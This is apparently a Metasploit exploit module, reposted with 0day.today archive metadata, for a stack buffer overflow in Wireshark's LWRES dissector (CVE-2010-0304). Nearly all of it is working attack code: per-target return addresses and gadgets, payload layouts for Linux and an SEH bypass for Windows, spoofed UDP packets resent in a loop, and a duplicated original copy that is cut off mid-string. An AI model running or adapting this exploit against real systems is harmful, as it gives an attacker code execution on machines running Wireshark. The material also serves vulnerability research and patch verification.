=======================================================================
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
=======================================================================
##
# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
#require 'racket'
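class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  # IPv4 header protocol number for UDP.  The layer-4 header built for the
  # spoofed datagram below is UDP, so the IP header must say 17; the
  # previous value (6 == TCP) labelled the datagram as TCP, which makes a
  # receiving stack parse the UDP header as a TCP header instead of
  # delivering the payload to the LWRES port.
  IPPROTO_UDP = 17

  # Registers module metadata, targets and options.
  #
  # Only targets 0, 1 and 4 carry a working code-execution layout; targets 2
  # and 3 ship a cyclic pattern with placeholder return addresses and are
  # effectively crash-only (see build_overflow_string).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',
      'Description'    => %q{
          The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
        1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
        overflow. This bug found and reported by babi.

        This particular exploit targets the dissect_getaddrsbyname_request function. Several
        other functions also contain potentially exploitable stack-based buffer overflows.

        The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents
        exploitation via the return address on the stack. Sending a larger string allows
        exploitation using the SEH bypass method. However, this packet will usually get
        fragmented, which may cause additional complications.

        NOTE: The vulnerable code is reached only when the packet dissection is rendered.
        If the packet is fragmented, all fragments must be captured and reassembled to
        exploit this issue.

        This version loops, sending the packet every X seconds until the job is killed.
      },
      'Author'         =>
        [
          'babi',    # original discovery/exploit
          'jduck',   # ported from public exploit
          'redsand'  # windows target/testing
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 8364 $',
      'References'     =>
        [
          [ 'CVE', '2010-0304' ],
          [ 'OSVDB', '61987' ],
          [ 'BID', '37985' ],
          [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],
          [ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => true, # at least capture privilege
      'Payload'        =>
        {
          'Space'       => 512,
          'BadChars'    => "\x00",
          'DisableNops' => true,
        },
      'DefaultTarget'  => 4,
      'Targets'        =>
        [
          [ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
            # breakpoint: lwres.so + 0x2ce2
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux',
              # edx points at our string when the overwritten return address is
              # used, so the gadget at Ret writes it into g_slist_append's GOT
              # entry right before that function is called:
              #
              #   mov [ebx+0xc],edx / jmp 0x804fc40 -->
              #   mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append
              #
              # ebx therefore has to hold GotAddr-0xc and edi any readable
              # address (both presumably restored from our buffer by the
              # epilogue pops; see build_overflow_string).
              'Ret'      => 0x804fc85,   # see above..
              'RetOff'   => 376,
              'Readable' => 0x804fa04,   # just anything
              'GotAddr'  => 0x080709c8   # objdump -R tshark | grep g_slist_append
            }
          ],
          [ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux',
              # The tshark technique does not apply here: no convenient
              # pointers to the buffer are left in registers / near the top
              # of the stack, so a plain jmp esp in the wireshark binary is
              # used instead.
              'Ret'      => 0x818fce8,   # jmp esp in wireshark bin
              'RetOff'   => 376,
              'Readable' => 0x8066a40,   # just any old readable addr (unused)
              'GotAddr'  => 0x818601c    # objdump -R wireshark | grep g_slist_append (unused)
            }
          ],
          # Crash-only target: Ret is a placeholder and is truncated to 32
          # bits when packed (see build_overflow_string).
          [ 'wireshark 1.2.5 on RHEL 5.4 (x64)',
            {
              'Arch'     => ARCH_X86_64,
              'Platform' => 'linux',
              'Ret'      => 0xfeedfed5deadbeef,
              'RetOff'   => 152,
            }
          ],
          # Crash-only target: Ret is a placeholder.
          [ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'osx',
              'Ret'      => 0xdeadbeef,
              'RetOff'   => 268,
            }
          ],
          # The following target was tested against Windows XP SP3 and Windows Vista
          [ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win',
              # NOTE: due to the length of this packet, your mileage may vary.
              'Ret'      => 0x61B4121B,
              # 0x655810b6 = pop/pop/ret in libpango
              # 0x02A110B6 = pop/pop/ret in libgtk-w
              # 0x03D710CC = pop/mov/pop/ret in packet
              # 0x61B4121B = pop/pop/ret in pcre3
              'RetOff'   => 2128,
            }
          ],
        ],
      'DisclosureDate' => 'Jan 27 2010',
      # Passive stance so the module runs as a background job.
      'Stance'         => Msf::Exploit::Stance::Passive))

    register_options([
      Opt::RPORT(921),
      Opt::RHOST("239.255.255.250"),
      OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),
      OptInt.new('DELAY', [true, 'This option sets the delay between sent packets', 5])
    ], self.class)

    register_advanced_options([
      OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ])
    ], self.class)

    deregister_options('FILTER', 'PCAPFILE')
  end

  # Builds the overflow string for the selected target, wraps it in a LWRES
  # getaddrsbyname request and resends it every DELAY seconds until a session
  # is created (when ExitOnSession is set) or the job is killed.
  #
  # With SHOST set the datagram is crafted with Racket and injected through
  # the capture mixin so the IP source can be spoofed (needs capture
  # privileges); otherwise a normal UDP socket is used.
  def exploit
    str    = build_overflow_string(target['RetOff'])
    sploit = build_lwres_request(str)

    shost = datastore['SHOST']
    if shost
      send_spoofed(sploit, shost)
    else
      send_direct(sploit)
    end
  end

  # Returns the string that overruns the dissector's stack buffer for the
  # current target, including the trailing (overwritten) return address.
  #
  # ret_offset:: distance from the start of the buffer to the saved return
  #              address (target['RetOff']).
  def build_overflow_string(ret_offset)
    if target == targets[0]
      # Debian tshark: the 16 bytes in front of the return address are
      # expected to land in callee-saved registers, so that the gadget at Ret
      # writes edx (our buffer) into g_slist_append's GOT slot.
      str = make_nops(ret_offset - payload.encoded.length - 16)
      str << payload.encoded
      str << [target['GotAddr'] - 0xc].pack('V')  # -> ebx; [ebx+0xc] is the GOT entry
      str << rand_text(4)
      str << [target['Readable']].pack('V')       # -> edi; [edi+8] must be readable
      str << rand_text(4)
      # return address is appended below
    elsif target == targets[1]
      # Debian wireshark: jmp esp lands right after the return address, where
      # a short backwards jump takes us into the payload.  esp is moved down
      # first so the payload does not get clobbered by later stack use.
      fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
      str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
      str << fix_esp
      str << payload.encoded
      str << [target.ret].pack('V')  # jmp esp
      distance = ret_offset + 4      # back over the buffer and the jmp esp address
      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    elsif target == targets[4]
      # Windows: /GS protects the return address, so the SEH record past the
      # buffer is overwritten instead.  The resulting datagram is large enough
      # to be fragmented at the IP layer, which is why results vary.
      str = make_nops(ret_offset - payload.encoded.length)
      str << payload.encoded
      str << generate_seh_record(target.ret)
      distance = ret_offset + 8      # back over the buffer and the SEH record
      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    else
      # Remaining targets have no usable Ret yet: just crash the dissector.
      str = Rex::Text.pattern_create(ret_offset)
    end

    # 'V' packs a 32-bit little-endian value regardless of target arch, so the
    # x64 target's placeholder Ret is reduced to its low dword.  That target is
    # crash-only at the moment, so it does not matter; a real x64 target would
    # need an arch-aware pack (Rex::Arch.pack_addr) here.
    str << [target.ret].pack('V')
    str
  end

  # Wraps +str+ in a LWRES packet: the 28-byte lwpacket header (opcode
  # 0x00010001 = getaddrsbyname), the request flags/addrtypes words, a 16-bit
  # name length, the name itself and two trailing NUL bytes.
  #
  # The header's total-length field (0x15d) is left as in the original public
  # exploit and is not recomputed for +str+; the dissector evidently reaches
  # the overflow based on the 16-bit name length alone.
  def build_lwres_request(str)
    sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
    sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    sploit << "\x00\x00\x00\x01"
    sploit << [str.length].pack('n')  # name length trusted by the dissector
    sploit << str
    sploit << "\x00\x00"
    sploit
  end

  # Crafts one raw IPv4/UDP datagram carrying +sploit+ from the spoofed source
  # address +shost+ to RHOST:RPORT and returns its packed bytes.
  def build_spoofed_datagram(sploit, shost)
    n = Racket::Racket.new

    n.l3 = Racket::L3::IPv4.new
    n.l3.src_ip   = shost
    n.l3.dst_ip   = rhost
    n.l3.protocol = IPPROTO_UDP
    n.l3.id       = rand(0x10000)
    n.l3.ttl      = 64

    n.l4 = Racket::L4::UDP.new
    n.l4.src_port = rand((2**16) - 1024) + 1024
    n.l4.dst_port = datastore['RPORT'].to_i
    n.l4.payload  = sploit

    # fills in the UDP length and the pseudo-header checksum
    n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
    n.pack
  end

  # Sends the spoofed datagram in a loop through the capture interface.  The
  # pcap handle is released even if injection raises or the job is killed.
  #
  # NOTE(review): unlike send_direct, +handler+ is only reached once the loop
  # exits, as in the original module; session_created? inside the loop
  # therefore relies on the framework having started the payload handler for
  # this passive module already.
  def send_spoofed(sploit, shost)
    print_status("Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})")
    open_pcap
    begin
      pkt = build_spoofed_datagram(sploit, shost)
      loop do
        break if session_created? && datastore['ExitOnSession']
        capture_sendto(pkt, rhost)
        sleep(datastore['DELAY'])
      end
    ensure
      close_pcap
    end

    handler
  end

  # Sends the request in a loop over a plain UDP socket (no spoofing).
  # A DELAY of 0 makes this a tight send loop.
  def send_direct(sploit)
    print_status("Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.")

    handler

    loop do
      break if session_created? && datastore['ExitOnSession']
      connect_udp
      udp_sock.put(sploit)
      disconnect_udp
      sleep(datastore['DELAY'])
    end
  end
end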
{"published": "2010-02-12T00:00:00", "id": "1337DAY-ID-10865", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:01:02", "bulletin": {"published": "2010-02-12T00:00:00", "id": "1337DAY-ID-10865", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.3, "modified": "2016-04-20T01:01:02"}}, "hash": "eb2d778b951aaede91dcc90f5e58a783588582e9295fbe57a1c4beb7cab16e63", "description": "Exploit for unknown platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T01:01:02", "edition": 1, "title": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow", "href": "http://0day.today/exploit/description/10865", "modified": "2010-02-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/10865", "references": [], "reporter": "babi", "sourceData": "=======================================================================\r\nWireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)\r\n=======================================================================\r\n\r\n##\r\n# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n#require 'racket'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\r\n\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\r\n\t\t\t\toverflow. This bug found and reported by babi.\r\n\r\n\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\r\n\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\r\n\r\n\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\r\n\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\r\n\t\t\t\texploitation using the SEH bypass method. 
However, this packet will usually get\r\n\t\t\t\tfragmented, which may cause additional complications.\r\n\r\n\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\r\n\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\r\n\t\t\t\texploit this issue.\r\n\r\n\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'babi', # original discovery/exploit\r\n\t\t\t\t\t'jduck', # ported from public exploit\r\n\t\t\t\t\t'redsand' # windows target/testing\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 8364 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0304' ],\r\n\t\t\t\t\t[ 'OSVDB', '61987' ],\r\n\t\t\t\t\t[ 'BID', '37985' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged'\t=> true, # at least capture privilege\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'DefaultTarget'\t=> 4,\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t# breakpoint: lwres.so + 0x2ce2\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# conveniently, edx pointed at our string..\r\n\t\t\t\t\t\t\t# and so, we write it to g_slist_append's GOT entry just before its called.\r\n\t\t\t\t\t\t\t# pwnt.\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# mov [ebx+0xc],edx / jmp 0x804fc40 -->\r\n\t\t\t\t\t\t\t# mov [esp+4],eax / mov eax,[edi+8] / mov 
[esp],eax / call g_slist_append\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t'Ret' => 0x804fc85, # see above..\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x804fa04, # just anything\r\n\t\t\t\t\t\t\t'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# the method for tshark doesn't work, since there aren't any convenient\r\n\t\t\t\t\t\t\t# pointers lying around (in reg/close on stack)\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# since the wireshark bin has a jmp esp, we'll just use that method..\r\n\t\t\t\t\t\t\t'Ret' => 0x818fce8, # jmp esp in wireshark bin\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x8066a40, # just any old readable addr (unused)\r\n\t\t\t\t\t\t\t'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86_64,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xfeedfed5deadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 152,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 268,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# The following target was tested against Windows XP SP3 and Windows Vista\r\n\t\t\t\t\t[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t# NOTE: due to the length of this packet, your mileage may vary.\r\n\t\t\t\t\t\t\t'Ret' => 0x61B4121B,\r\n\t\t\t\t\t\t\t# 0x655810b6 = pop/pop/ret in 
libpango\r\n\t\t\t\t\t\t\t# 0x02A110B6 = pop/pop/ret in libgtk-w\r\n\t\t\t\t\t\t\t# 0x03D710CC = pop/mov/pop/ret in packet\r\n\t\t\t\t\t\t\t# 0x61B4121B = pop/pop/ret in pcre3\r\n\t\t\t\t\t\t\t'RetOff' => 2128,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 27 2010',\r\n\t\t\t# Set it to passive mode to background it.\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(921),\r\n\t\t\tOpt::RHOST(\"239.255.255.250\"),\r\n\t\t\tOptAddress.new(\t'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),\r\n\t\t\tOptInt.new(\t\t'DELAY', [true, 'This option sets the delay between sent packets', 5])\r\n\t\t], self.class)\r\n\r\n\t\tregister_advanced_options([\r\n\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ])\r\n\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE')\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_offset = target['RetOff']\r\n\r\n\t\t# we have different techniques depending on the target\r\n\t\tif (target == targets[0])\r\n\t\t\t# debian tshark\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length - 16)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << [target['GotAddr'] - 0xc].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\tstr << [target['Readable']].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\t# ret is next\r\n\t\telsif (target == targets[1])\r\n\t\t\tfix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"add esp,-3500\").encode_string\r\n\t\t\tstr = make_nops(ret_offset - fix_esp.length - payload.encoded.length)\r\n\t\t\tstr << fix_esp\r\n\t\t\tstr << payload.encoded\r\n\t\t\t# jmp esp...\r\n\t\t\tstr << [target.ret].pack('V')\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 4\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telsif (target == targets[4])\r\n\t\t\t# ugh, /GS and UDP length 
issues :-/\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << generate_seh_record(target.ret)\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 8\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telse\r\n\t\t\t# this is just a simple DoS payload\r\n\t\t\tstr = Rex::Text.pattern_create(ret_offset)\r\n\t\t\t#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string\r\n\t\tend\r\n\r\n\t\t# add return address\r\n\t\t#XXX: this isn't working?\r\n\t\t#str << Rex::Arch.pack_addr(target.arch, target.ret)\r\n\t\tstr << [target.ret].pack('V')\r\n\r\n\t\t# form the packet's payload!\r\n\t\tsploit = \"\\x00\\x00\\x01\\x5d\\x00\\x00\\x00\\x00\\x4b\\x49\\x1c\\x52\\x00\\x01\\x00\\x01\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x01\"\r\n\t\tsploit << [str.length].pack('n')\r\n\t\tsploit << str\r\n\t\tsploit << \"\\x00\\x00\"\r\n\r\n\t\tshost = datastore['SHOST']\r\n\t\tif (shost)\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})\")\r\n\t\t\topen_pcap\r\n\r\n\t\t\tn = Racket::Racket.new\r\n\r\n\t\t\tn.l3 = Racket::L3::IPv4.new\r\n\t\t\tn.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\t\t\tn.l3.dst_ip = rhost\r\n\t\t\tn.l3.protocol = 6\r\n\t\t\tn.l3.id = rand(0x10000)\r\n\t\t\tn.l3.ttl = 64\r\n\r\n\t\t\tn.l4 = Racket::L4::UDP.new\r\n\t\t\tn.l4.src_port = rand((2**16)-1024)+1024\r\n\t\t\tn.l4.dst_port = datastore['RPORT'].to_i\r\n\r\n\t\t\tn.l4.payload = sploit\r\n\r\n\t\t\tn.l4.fix!(n.l3.src_ip, n.l3.dst_ip)\r\n\t\t\tpkt = n.pack\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? 
and datastore['ExitOnSession']\r\n\t\t\t\tcapture_sendto(pkt, rhost)\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tclose_pcap\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.\")\r\n\r\n\t\t\thandler\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tconnect_udp\r\n\t\t\t\tudp_sock.put(sploit)\r\n\t\t\t\tdisconnect_udp\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "5b307381861d9a4c51b0e881eef973d3", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "modified"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "484c67b3fd6e747e569de85354c053d3", "key": "sourceData"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "907795d030ce45a1a44e6f3fc3f2b888", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "2c638333d43ee1d828de3652ea30ae2b", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6699589a2999644ec5b9bbfe07255d3c", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category remote exploits", "hash": "8106bfb42c139f6c6e6363bcf44fc8bcc6f6015ae98af27f6446c5cbe9d61a76", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-02-06T05:08:19"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-2128", "1337DAY-ID-8364"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10865", "SECURITYVULNS:VULN:5537"]}], "modified": "2018-02-06T05:08:19"}, "vulnersScore": 0.5}, 
"type": "zdt", "lastseen": "2018-02-06T05:08:19", "edition": 2, "title": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow", "href": "https://0day.today/exploit/description/10865", "modified": "2010-02-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/10865", "references": [], "reporter": "babi", "sourceData": "=======================================================================\r\nWireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)\r\n=======================================================================\r\n\r\n##\r\n# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n#require 'racket'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\r\n\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\r\n\t\t\t\toverflow. This bug found and reported by babi.\r\n\r\n\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\r\n\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\r\n\r\n\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\r\n\t\t\t\texploitation via the return address on the stack. 
Sending a larger string allows\r\n\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\r\n\t\t\t\tfragmented, which may cause additional complications.\r\n\r\n\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\r\n\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\r\n\t\t\t\texploit this issue.\r\n\r\n\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'babi', # original discovery/exploit\r\n\t\t\t\t\t'jduck', # ported from public exploit\r\n\t\t\t\t\t'redsand' # windows target/testing\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 8364 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0304' ],\r\n\t\t\t\t\t[ 'OSVDB', '61987' ],\r\n\t\t\t\t\t[ 'BID', '37985' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged'\t=> true, # at least capture privilege\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'DefaultTarget'\t=> 4,\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t# breakpoint: lwres.so + 0x2ce2\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 